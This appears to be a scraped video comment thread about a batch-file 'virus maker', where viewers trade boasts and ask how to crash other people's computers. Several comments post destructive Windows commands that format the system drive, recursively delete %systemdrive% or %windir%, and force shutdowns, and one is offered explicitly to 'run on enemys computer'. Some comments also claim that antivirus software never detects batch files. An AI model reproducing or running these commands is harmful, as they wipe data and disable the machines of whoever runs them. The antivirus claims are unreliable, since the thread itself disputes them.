Added: 3 years ago
From: jakash3
Views: 3,373
Sort by time | Sort by thread (beta)

Link to this comment:

Share to:

All Comments (55)

Sign In or Sign Up now to post a comment!
  • Real virus or not, it's a great program. I just got finished making a real anti-virus...but the scan takes a while

  • i thinks its a awesome program. im a batch coder 2, although i dont really do viruses i do it sonetines. great vid

  • Please reply.If I send it to someone through an email,will the virus actiually send itself around from email to email?

  • @MJL600000 no

  • @jakash3 Then its not really a proper virus

  • @MJL600000 By definition a virus is a program that copies itself to other files when executed. The effect of spreading through email is an optional feature of a virus's payload, and may more likely relate to the ability of a worm. Either way, I made this a long time ago, and I consider it as part of my history of learning.

  • i like your video can you send me your own attaker please or send me the waiting screan i mean start up screan in which you write bacth windows production and second a jakash3 video please send me that you made ownplzzzzzzzzz

  • Looks Tiring xD Nice job man!

  • Good job Anon.

  • Error probly is the fact TaskKill doesnt really owrk on vista and besdies its crap

  • I could make something like this....

    *gets evil ideas*....

    ;)

  • So many people say things like "if it's a virus, my anti-virus will get it!" Truth is people, it wont, cause batch files are the computers original native com(DOS) files and it doesnt question them. Even if you were to scan a batch virus, you would come up with nothing, as its all just text that runs commands your computer is capable of doing on its own. So basically, nothing this program creates will come up in virus scans. In short, Jakash3 is a smart guy, with a lot of time on his hands.

  • @mysteryloser24 WRONG! depending on what code you use decides whether it's malware or not. I made a Trojan from batch which at one point disables the mouse and keyboard, and also opens a load of websites like youareanidiot(dot)org and stuff and when i try to save it: "ding ding ding THREAT HAS BEEN DETECTED"

  • @ATV642 it also formats the C:/ Drive

  • @ATV642 Not wrong at all sunshine... Tell you what, you stick to making those little batch fails, I mean files, and i'll get back to managing a software company. How's that sound? Look, no matter what code a batch file contains, windows will run it. If it detects a threat, then you've got a pretty weird anti-virus that can't distinguish virus's from fails.

  • @mysteryloser24 O rly? then how come when i test it on a virtual machine, when i run it, it formats my C:/ Drive disables Mouse and Keyboard, and basically mucks up the pc?

  • @ATV642 Because a hard disk format isn't classed as malware. Neither is disabling hardware peripherals. It may be annoying for the user, but Windows does not class these things as the work of malware, unless it detects significant threat from the program. This, is no threat that is visible to windows, as they are ordinary tasks that Windows can already do manually.

  • @mysteryloser24 weird anti-virus? tell me what anti-virus you use.

  • @ATV642 Look, in short, the tasks your batch file carry out are not vicious acts of a malware program, they are simple Windows tasks, and they tend not to be questioned by an anti-virus, no matter which one it is. This conversation is over. Adios.

  • is there a way to make virus bomb. like if I send the batch file to someone, I want to to open a lot of windows so that it crashes their computer???

  • best small virus ever

    @echo off

    color a

    color 1f

    format %systemdrive%

  • is this .exe or .bat? please reply to me

  • @kurtle005 I think this is a batch file (.bat) but theres a program called Bat2Exe which takes batch files and converts them to .exe files. Also it lets you add other files into the program, and allows you to give it copyright info and an icon too. Hope I helped :)

  • lol.....even windows defender will detect that virus....this is childplay.

  • doesnt work for me. i get a error eventually

  • What kind of error?

  • At some point when i press y it says its not a valid choice or something like that

  • Towards the end of the prompts, there are 2 questions that ask for number input for a message box. Answering one of those questions with 'y' is an error.

  • Ok ill check that. I have been rushing the questions a bit. I'll pm you if i still have anymore problems

  • is the download link save to use or is it a virus

    the programs i very cool

  • The file itself just writes text to a file depending on the y/n answers you input to its prompts. So it's safe to use and it is not a virus. Just make sure you do not open the generated file it outputs to your desktop unless it is *.txt

  • wriet this c ommand del / f / c:

  • Hi Jakash,I think it took you many days to make the Taskkiller,isnt it?Well its Pretty COOL!!!!

  • Double click that and you get one fucked up computer.

  • what do i open .ext files with?

  • @maam31 lulz its txt dude, and its a text file. If you mean .exe files, they are just opened by windows on it's own.

  • del %systemdrive%\*.* /s /f /q

    easiest way xD

  • Were Can I Download This Song........

    Tell Me Please....

  • Nice music bro I like the KH1,2 Soundtrack aswell xD great vid

  • killer virus @echo off title SUCKER!!!! del /f %windir% echo you got no windows AHAHAHA shutdown -f -s -t 45 -c "You have 45 seconds to save you files" ping localhost -n 2 >nul shutdown -f -s -t 10 -c "Changed my mind you have 10 seconds" shutdown -f -s -t 2 -c "TOO LATE" :loop echo HAHAHAHA goto loop save as bat and run on enemys computer HAHAHAHA
  • primise if i downlaod this thing it wont  be a virus

  • how itz the name of song?

  • how do you make a virus maker??

  • its just a bunch of codes on notepad that when saved at .bat file will run those commands when the file is open

  • @Trojan99969 I realize your comment is 2 years old but.... oh well. Download the file in the link then extract. Right click it, select edit. this gives you the code, and you can figure out how to make your own based off of that.

  • send me the script please 5/5

  • Sorry you couldn't download it in a while, I fixed the download link. You can download it in text form so save it as .bat

  • can you give me the .txt ??

  • actually MasterMindzCreation you are wrong.

    These days anti virus programs are built in a way that cant be easily ended as there is more than 1 anti virus process running at a time each protect each other and re starting if the process is terminated.

  • This is fucking shit all it does is end useless processes and delete shit that you can easily recover back.

    And an anti virus will block it before it deletes anything or ends any process.

  • An Anti virus doesnt delete batch unless its using certain malicious coding that will be recognized. Only this guy is using basic commands off of unix so in other words..No anti virus will stop it. And his lil fancy command window with the motion picture as if its loading is really fucking simple to make people.. He made it onces.. copied it multiple of times. and pinged it.. Think people. Come on now.

  • @ParramattaSoldier it is a batch file, which means it uses cmd commands for deletion, etc. No virus scanner will block cmd commands. End of story.

  • Lol I just called the NSA. They're on their way to arrest the maker of this video and all the people who commented on it. LOL I love I.P Trackers. Enjoy.

  • Jakash3 Is a pro.. all things that he do are awnsome , his a genius :D

  • Hey how can i tell what im downloading dosent have these viruses your showing us

  • Just trust me! I didn't put anything in here that would harm your computer. Besides im sure if you had a good internet security it would remove harmful content from downloads.

  • but it lloks like your a mastermind you probly could get passed all my shit... but i guess ill trust you

  • WOW!! i m impressed!! that thing is very cool...thank you!

  • Wow so many prompts. That must've took a while...

  • Awesome, Good Job =)

Loading...
Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more